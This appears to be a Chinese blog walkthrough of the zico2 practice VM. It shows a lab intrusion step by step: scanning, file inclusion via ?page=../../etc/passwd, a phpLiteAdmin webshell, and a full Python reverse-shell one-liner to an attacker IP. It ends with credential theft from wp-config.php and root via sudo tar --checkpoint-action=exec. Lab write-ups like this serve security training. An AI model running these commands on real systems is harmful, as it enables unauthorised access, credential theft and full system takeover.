zico2靶机

zico2靶机

环境:下载靶机、解压、VMware打开,并将其和kali虚拟机的网络调成NAT模式

一.明确目标

探测目标主机IP情况

nmap 192.168.153.0/24

在这里插入图片描述

目标主机IP:192.168.153.157

Kali的IP:192.168.153.129

二.信息搜集

Nmap 进行常规端口开放扫描

进行namp全端口服务枚举

nmap 192.168.153.138  -p-  -A

在这里插入图片描述

可以看到目标靶机上开放了SSH 22端口,Http 80端口, 111端口,38409端口

对该网站目录进行爆破枚举,利用到的是kali上的dirsearch:

dirsearch -u 192.168.153.157

在这里插入图片描述

http://192.168.153.157/dbadmin/

http://192.168.153.157/img/

首先在浏览器中访问http://192.168.153.157

在这里插入图片描述

在这里插入图片描述

每个可以点击的都查看一下,发现了最下面有个CHECK THEM OUT!点击进去不太一样

在这里插入图片描述

在其URL中有?page=的存在,疑似有文件包含,可以尝试一哈:

使用工具扫描发现确实存在目录遍历的漏洞,并且已经给出了攻击细节
在这里插入图片描述

page=../../etc/passwd

在这里插入图片描述

果然存在文件包含!!!

再访问http://192.168.153.157/dbadmin/

在这里插入图片描述

发现了phpLiteAdmin v1.9.3的登录页面,尝试弱密码登录,发现密码是admin。

在这里插入图片描述

(备注:phpLiteAdmin是一个用PHP写的基于web的SQLite数据库管理工具,同时支持SQLite3和SQLite2。 和SQLite一样,使用一个单一的文件(phpliteadmin.php)来运行,把这个文件放在有PHP的环境里运行,然后在浏览器中访问就可以使用而无需安装。)

在这里插入图片描述

前面我们发现了phpLiteAdmin v1.9.3的登录页面,也知道其版本,在Kali中搜索其有没有漏洞存在

searchsploit phpLiteAdmin 1.9.3

在这里插入图片描述

将24044.txt下载下来

searchsploit -m 24044.txt

在这里插入图片描述

cat一下:

在这里插入图片描述

其中大概意思就是攻击者可以使用php扩展创建sqlite数据库,并将php代码作为文本字段插入。完成后,攻击者可以通过使用web浏览器访问数据库文件来执行它。

也就是phpliteadmin <=1.9.3版本是存在远程php代码执行漏洞!!!!

首先创建一个hack.php数据库

在这里插入图片描述

在hack.php数据库里面创建任意一张表

在这里插入图片描述

内容写成一句话,由于对单引号做了过滤所以一句话里面不要加单引号

在这里插入图片描述

返回view.php包含hack.php

在这里插入图片描述

使用MAX HacKBar,一句话木马可以成功运行不

在这里插入图片描述

三.WebShell

使用pyhton来反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.153.158",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

在Kali中开启端口8888监听,执行代码

监听成功,使用命令显示当前路径

SHELL=/bin/bash script /dev/null

在这里插入图片描述

在zico的家目录中找到wordpress,这是一个免费开源的建站程序,进行该目录.

在这里插入图片描述

cat一下wp-config.php

在该文件中找到了zico的数据库密码

在这里插入图片描述

得到的用户和密码进行SSH远程登录尝试,成功登录

在这里插入图片描述

四.提权

使用sudo -l

在这里插入图片描述

可以通过具有root权限的tar和zip来提权。

通过tar提权:

sudo -u root tar cf /dev/null exploit --checkpoint=1 --checkpoint-action=exec="/bin/bash"


-c:创建新的档案文件,相当于打包(-x,相反的操作,拆包)

-f:使用档名,f之后直接加档名,中间不能加其他参数

--checkpoint=n:每写入n个记录之后设置一个检查点,在检查点可以执行任意的操作,操作由--checkpoint-action指定

exec:执行外部命令

在这里插入图片描述

提权成功!!!!!!

补充:通过uname -a查看内核,其版本较低。可已使用dirtycow(脏牛)进行提权,exp网站:https://github.com/FireFart/dirtycow

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gaynell

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值